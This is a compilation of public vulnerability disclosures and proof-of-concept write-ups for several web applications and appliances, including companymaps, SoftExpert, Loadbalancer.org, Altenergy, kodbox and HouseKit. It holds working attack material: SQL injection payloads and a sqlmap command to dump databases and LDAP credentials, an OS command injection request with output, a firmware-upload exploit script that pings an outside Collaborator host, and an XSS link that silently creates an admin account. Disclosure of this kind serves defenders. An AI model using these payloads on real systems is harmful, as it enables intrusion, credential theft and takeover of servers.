SQL injection vulnerability found in Maximilian Vogt companymaps (cmaps) v.8.0 allows a remote attacker to execute arbitrary code via a crafted script in the request.

# Exploit Title: Unauthenticated SQL injection  
- Google Dork:  
- Date: 27.04.2023  
- Exploit Author: Lucas Noki (0xPrototype)  
- Vendor Homepage: https://github.com/vogtmh  
- Software Link: https://github.com/vogtmh/cmaps  
- Version: 8.0  
- Tested on: Mac, Windows, Linux  
- CVE : CVE-2023-29809

*Description:*

The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However if a single quote gets appended to the value of the `bookmap` parameter we get an error message:  
```html  
<b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />  
```

Now if two single quotes get appended we get the normal response without an error. This confirms the opportunity for sql injection. To really prove the SQL injection we append the following payload:   
```  
'-(select*from(select+sleep(2)+from+dual)a)--+  
```

The page will sleep for two seconds. This confirms the SQL injection.

*Steps to reproduce:*

1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+```

2. If the site slept for two seconds run the following sqlmap command to dump the whole database including the ldap credentials.  
   ```shell  
   python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump  
   ```

Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

## Request to the server:

<img src="Screenshot 2023-04-30 at 22.23.51.png" alt="Screenshot 2023-04-30 at 22.23.51" style="zoom:50%;" />

## Response from the server:

Look at the response time.

<img src="Screenshot 2023-04-30 at 22.24.35.png" alt="Screenshot 2023-04-30 at 22.24.35" style="zoom:50%;" />

CVE-2023-29809: Companymaps 8.0 SQL Injection ≈ Packet Storm

SoftExpert (SE) Excellence Suite 2.x versions before 2.1.3 is vulnerable to Local File Inclusion in the function /se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php.

**Remote Code Execution in SoftExpert Excellence Suite 2.0 - CVE-2023-30330**

Authenticated Local File Inclusion to Remote Code Execution on SoftExpert Excellence Suite EQM.

CVE-2023-30330

*   SE Suite 2.x versions before 2.1.3
*   Tested on versions: 2.0.15.31 and 2.0.15.115

**LFI PoC**

https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0/tree/main/PoC

**1- Local File Inclusion:**

The researcher was able to find a PHP function **"/se/v42300/generic/gn\_defaultframe/2.0/defaultframe\_filter.php"** that includes a file with extension **".inc"** in a base64 encoding format through the **“managerPath”** parameter in a POST request. By changing the **“.inc”** file to for example **“C:\\windows\\win.ini”** and converting it back to base64, we are going to get that file on the system.

 

The PHP file **"defaultframe\_filter.php"** is using the function “require\_once()” to include the files, this function could allow a hacker to execute Remote Code Execution by including poisoned logs.

**2- Remote Code Execution:**

*   We can include and read PHP error logs.
*   We can use require\_once() to execute PHP code.
*   We need to insert PHP code into the error logs.

By analyzing the **“user\_action.php”** function when uploading a new profile picture, we can notice that when you upload an invalid or malicious image, the page will throw an error 401. After causing the error you can read the logs again and see that some parameters like the “Referer” header will be logged, knowing this we can inject PHP code into the **“Referer”** header.

After trying to upload the malicious image and injecting PHP code into the Referer, we can confirm the log poisoning by reading the logs.

Now we can execute commands by reading the logs. **Command:** whoami

CVE-2023-30330: GitHub - Filiplain/LFI-to-RCE-SE-Suite-2.0: Authenticated Local File Inclusion to Remote Code Execution on SoftExpert Suite EQM.

Loadbalancer.org Enterprise VA MAX through 8.3.8 has an OS Command Injection vulnerability that allows a remote authenticated attacker to execute arbitrary code.

Vulnerability: OS Command Injection

OS Command Injection in Loadbalancer.org Appliance v8.3.8-134

Vendor: Loadbalancer.org, https://www.loadbalancer.org

Product: ENTERPRISE VA MAX

Version affected: Loadbalancer.org Appliance v8.3.8 as the latest in October 2019

**Product description:**

“Loadbalancer.org is a well-established international provider of reliable, versatile and cost-effective application delivery products and services. The load balancer experts help solve the issues of availability and scalability by providing an unbreakable solution to ensure zero downtime of critical IT applications.

Loadbalancer.org’s consultancy led approach means they have specialist engineers that will help design and simplify architecture guaranteeing painless deployments every single time. The team of experts are effortlessly able to set up test environments, document each deployment, provide customized solutions and assist with complex migrations. They will support a business, not just the load balancer!

Loadbalancer.org load balancers are sold as hardware, virtual or cloud formats and are more scalable, flexible and are economical compared to competitive offerings. With no performance or feature restrictions, their suite of products can load balance any application, for any company, in any industry, anywhere in the world.

Allowing customers to have direct access 24 hours a day 7 days a week to a team of passionate engineers via phone, online chat and e-mail sets Loadbalancer.org apart from other ADC vendors.

” as per statement on https://www.linkedin.com/company/loadbalancer-org website.

*   CVE ID: CVE-2020-13378
*   CWE ID: CWE-78

**Proof of Concept**

A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted HTTP request. This is exploitable by an authenticated attacker who submits a modified GET request.

Sample GET request, issuing ‘id’ OS command returns ‘uid=48(apache)’

Identified vulnerable parameters: waf\_filename

**Request:**

    GET /lbadmin/ajax/js_dispatcher.php?option=waf_log&waf_filename=modsec_audit.log%7c%60id%60&log_option=base HTTP/1.1
    Host: 10.0.0.99:9443
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Authorization: Basic aW5mZ[...]TEw
    Connection: close
    Cookie: menu=log%2Flaw; hiderestartwarning=0
    
    
    HTTP/1.1 200 OK
    Date: Thu, 03 Oct 2019 11:38:17 GMT
    Server: Apache
    Content-Length: 800
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    
    <div class="exception"><h2>Exception LBFileError:</h2><p><em>Please report the full text of this exception to <a href="mailto:support@loadbalancer.org">Loadbalancer.org Support</a>, together with brief details of the operation you were performing.</em></p>
    <p><em>Thank you.</em></p><p><pre>ensure_access(): &#039;chown  --no-dereference root:apache /var/log/httpd/modsec_audit.log|`id`&#039; failed: errno 127, sh: uid=48(apache): command not found</pre></p><h3>Trace:</h3>
    <p><pre>#0 /var/www/html/lbadmin/inc/waf.inc(1878): ensure_access(&#039;/var/log/httpd/...&#039;)
    #1 /var/www/html/lbadmin/inc/js_dispatch_func_call.inc(62): load_waf_log_file(&#039;modsec_audit.lo...&#039;, &#039;base&#039;)
    #2 /var/www/html/lbadmin/ajax/js_dispatcher.php(70): get_waf_log(Array)
    #3 {main}</pre></p></div>

**Public searches:**

https://www.zoomeye.org/searchResult?q=Loadbalancer%2Corg

https://www.shodan.io/search?query=loadbalancer.org

but this company has interestingly some reputable partnership alliance

**References**

1.  https://www.immuniweb.com/vulnerability/os-command-injection.html
2.  https://www.loadbalancer.org
3.  https://cwe.mitre.org/data/definitions/78.html
4.  https://www.checkmarx.com/knowledge/knowledgebase/OS-Command\_Injection

CVE-2020-13378: OS Command Injection in Enterprise loadbalancer VA MAX - v8.3.8 and earlier

A cross-site scripting (XSS) vulnerability in PrestaShop v1.7.7.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the message parameter in /contactform/contactform.php.

**PrestaShop Cross-site Scripting vulnerability**

Moderate severity GitHub Reviewed Published May 12, 2023 to the GitHub Advisory Database • Updated May 12, 2023

GHSA-6mhc-hqr3-w466: PrestaShop Cross-site Scripting vulnerability

Altenergy Power Control Software C1.2.5 was discovered to contain a remote code execution (RCE) vulnerability via the component /models/management_model.php.

**title : insufficient verification of firmware integrity "Altenergy Power Control Software" led to RCE****SW ver: C1.2.5****Vendor: https://apsystems.com/****Google Dork: intitle:"Altenergy Power Control Software"****Affected device: ENERGY COMMUNICATION UNIT**

**POC Video :**

**vulnerable code :**

"/home/local\_web/pagesapplication/models/management\_model.php"

 public function exec\_upgrade\_ecu()
    {
        $results = array();
        $res\_array = array();

        exec("rm -rf /tmp/update\_localweb/");
        if ($\_FILES\["file"\]\["error"\] > 0)
        {
            array\_push($res\_array, "Return Code: " . $\_FILES\["file"\]\["error"\] . "<br />");
            $results\["value"\] = 1;
        }
        else
        {
            array\_push($res\_array, "Upload: " . $\_FILES\["file"\]\["name"\] . "<br />");
            array\_push($res\_array, "Type: " . $\_FILES\["file"\]\["type"\] . "<br />");
            array\_push($res\_array, "Size: " . ($\_FILES\["file"\]\["size"\] / 1024) . " Kb<br />");
            array\_push($res\_array, "Temp file: " . $\_FILES\["file"\]\["tmp\_name"\] . "<br />");        

            move\_uploaded\_file($\_FILES\["file"\]\["tmp\_name"\], "/tmp/" . $\_FILES\["file"\]\["name"\]);
            array\_push($res\_array, "Stored in: " . "/tmp/" . $\_FILES\["file"\]\["name"\]);
            exec("tar xjvf /tmp/".$\_FILES\["file"\]\["name"\]." -C /tmp");
            exec("ls /tmp/update\_localweb/assist", $temp, $value);
            exec("/tmp/update\_localweb/assist &");
            $results\["value"\] = $value ? 1 : 0;
        }

        $results\["result"\] = implode("\\n",$res\_array);
        return $results;
    }

**Exploit :**

exploit.sh

#!/bin/bash
mkdir update\_localweb 2>/dev/null
payload='ping -c 1 ahvmb8ham4hkik6ifzt7o8puyl4hs6.burpcollaborator.net'
echo $payload \> update\_localweb/assist
chmod 777 update\_localweb/assist
tar cjvf b4db0t.bin update\_localweb/
rm -rf update\_localweb 

Browse to http://<IP\_ADDR>/index.php/management/upgrade\_ecu and upload b4db0t.bin POC :

CVE-2023-31502: Disclosures/Insufficient_Verification_of_Data_Authenticity.MD at main · ahmedalroky/Disclosures

**PRESTA-SHOP 1.7.7.4 REFLECTED CROSS SITE SCRIPTING**

Vulnerable Parameter: message

XSS Payload : %3cimg+src+onerror%3dprompt%288%29%3e

<Vendor> : https://www.prestashop.com/

**Vulnerable Code Part**

Default File Path

> /modules/contactform/contactform.php 

> Note: Some parameters have been changed by the company using the application.

**Description**

The PrestaShop web application lead the message value without any sanitization on contact-form .The attacker could be inject xss payload with changes the HTTP 'post' request to Http 'get' request for exploitation. That Exploitation shown belows.

**Http Request-Response**

CVE-2023-31508: Research/ReflectedXSS_1.7.7.4.md at main · mustgundogdu/Research

kodbox <= 1.37 is vulnerable to Cross Site Scripting (XSS) via the debug information.

English version

**0x01 Vulnerability Description**

Reflective xss vulnerability caused by debug information

**0x02 Affected version**

kodbox<=V1.39

**0x03 Vulnerability recurrence**

Triggering conditions

*   Turn off csrf protection
*   Administrator privileges

Turn off csrf protection steps

Desktop->System settings->Basic->Security->Enable csrf protection (OFF)

Then construct the link to trigger xss

    http://target.com/?API_ROUTE=admin%2Fshare%2Fget&type=<embed%20src%3d"data%3atext%2fhtml%3bbase64%2c%20PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4%3d">
    

Here construct a poc to add an administrator, because csrf is closed, here directly send a get request to add an administrator through the img tag, the added account is testu and the password is testuser

       <img src="/?API_ROUTE=admin/member/add%26name=testuser%26nickName=testu%26password=testuser%26addMore=base%26roleID=3%26groupInfo=%7B%221%22%3A%221%22%7D%26sizeMax=0%26sizeUse=0" style='display:none'>
    

full link, visit

    http://target.com/?API_ROUTE=admin/share/get&type=<img%20src="/?API_ROUTE=admin/member/add%26name=testuser%26nickName=testu%26password=testuser%26addMore=base%26roleID=3%26groupInfo=%7B"1"%3A"1"%7D%26sizeMax=0%26sizeUse=0"%20style=%27display:none%27>
    

Successfully created an admin user

*   **本文作者：**Juneha
*   **本文链接：**https://blog.mo60.cn/index.php/archives/kodbox-xss.html
*   **版权声明：**本博客所有文章除特别声明外，均默认采用 **CC BY-NC-SA 4.0** 许可协议。
*   **文章声明：**文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任，本人坚决反对利用文章内容进行恶意攻击行为，推荐大家在了解技术原理的前提下，更好的维护个人信息安全、企业安全、国家安全。

如果觉得我的文章对你有用，请随意赞赏,可备注留下ID方便感谢

CVE-2023-29791: kodbox xss - JunBlog

The Customer Management Framework (CMF) for Pimcore adds functionality for customer data management. In `pimcore/customer-management-framework-bundle` prior to version 3.3.9, business logic errors are possible in the `Conditions` tab since the counter can be a negative number. This vulnerability is capable of the unlogic in the counter value in the Conditions tab. Users should update to version 3.3.9 to receive a patch or, as a workaround, or apply the patch manually.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Case Studies
    
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   In this repository All GitHub
    

*   No suggested jump to results

*   In this repository All GitHub
    
*   In this organization All GitHub
    
*   In this repository All GitHub
    

Sign in

Sign up

pimcore / **customer-data-framework** Public

*   Notifications
*   Fork 81
*   Star 76
    

*   Code
*   Issues 16
*   Pull requests 3
*   Actions
*   Security
*   Insights

More

1.  Releases
2.  v3.3.9

Latest

Latest

Compare

Choose a tag to compare

 dvesh3 released this

10 May 13:55

v3.3.9

e8424fd

This commit was created on GitHub.com and signed with GitHub’s **verified signature**.

GPG key ID: 4AEE18F83AFDEB23

Learn about vigilant mode.

**What's Changed**

*   \[Security\] Embeding untrusted input inside CSV files leads to Formula Injection/CSV Injection by @mcop1 in #453
*   \[Security\] Restrict negative value by @aryaantony92 in #466
*   Fix phpdocs for DefaultMariaDbActivityList $activities property by @dvesh3 in #468

**Full Changelog**: v3.3.8...v3.3.9

**Contributors**

*   
*   
*   

dvesh3, mcop1, and aryaantony92

Assets 2

CVE-2023-32075: Release 3.3.9 · pimcore/customer-data-framework

HouseKit version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : codesler.com                                                               ││  Vendor   : Codesler - Rohit Chouhan (codester.com)                                    ││  Software : HouseKit 1.0 - Rent Property Booking PHP Script                            ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /flat_details.phpGET parameter 'id' is vulnerable to RXSShttps://website/flat_details.php?id=22&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3EPath: /flats.phpGET parameter 's' is vulnerable to RXSShttps://website/flats.php?tab=on&s=Hyderabadi3phy%3cscript%3ealert(1)%3c%2fscript%3ezx0nx[-] Done

HouseKit 1.0 Cross Site Scripting

HouseKit version 1.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : codesler.com                                                               ││  Vendor   : Codesler - Rohit Chouhan (codester.com)                                    ││  Software : HouseKit 1.0 - Rent Property Booking PHP Script                            ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /flat_details.phpGET parameter 'id' is vulnerable to SQL Injectionhttps://website/flat_details.php?id=[SQLI]---Parameter: id (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=22 AND (SELECT 2116 FROM (SELECT(SLEEP(5)))vxMc)    Type: UNION query    Title: Generic UNION query (NULL) - 8 columns    Payload: id=-4049 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b706271,0x4175424a73725a4b6b757359756765517a78784a6b50706b464f474978545652546a4a496c505841,0x716b6a6271),NULL,NULL,NULL-- ----Path: /flats.phpGET parameter 's' is vulnerable to SQL Injectionhttps://website/flats.php?tab=on&s=[SQLI]---Parameter: s (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: tab=on&s=Hyderabad' AND (SELECT 5046 FROM (SELECT(SLEEP(5)))BKYF) AND 'ReOi'='ReOi    Type: UNION query    Title: Generic UNION query (NULL) - 8 columns    Payload: tab=on&s=Hyderabad' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170706a71,0x6e536b46764c48414b6663545a4f78576a56794c74766e5351494f624c786261797255684d5a6d6d,0x716a767071),NULL,NULL,NULL-- ----[+] Starting the Attackfetching current databasecurrent database: '**40*26_housekit'fetching tables+--------------+| admin        || flats        || kyc          || owner        || review       || settings     || transactions || users        || wallet       || withdraw     |+--------------+fetching columns for table 'admin'+----------+---------+| Column   | Type    |+----------+---------+| id       | int(11) || password | text    || username | text    |+----------+---------+[-] Done

Tag

#php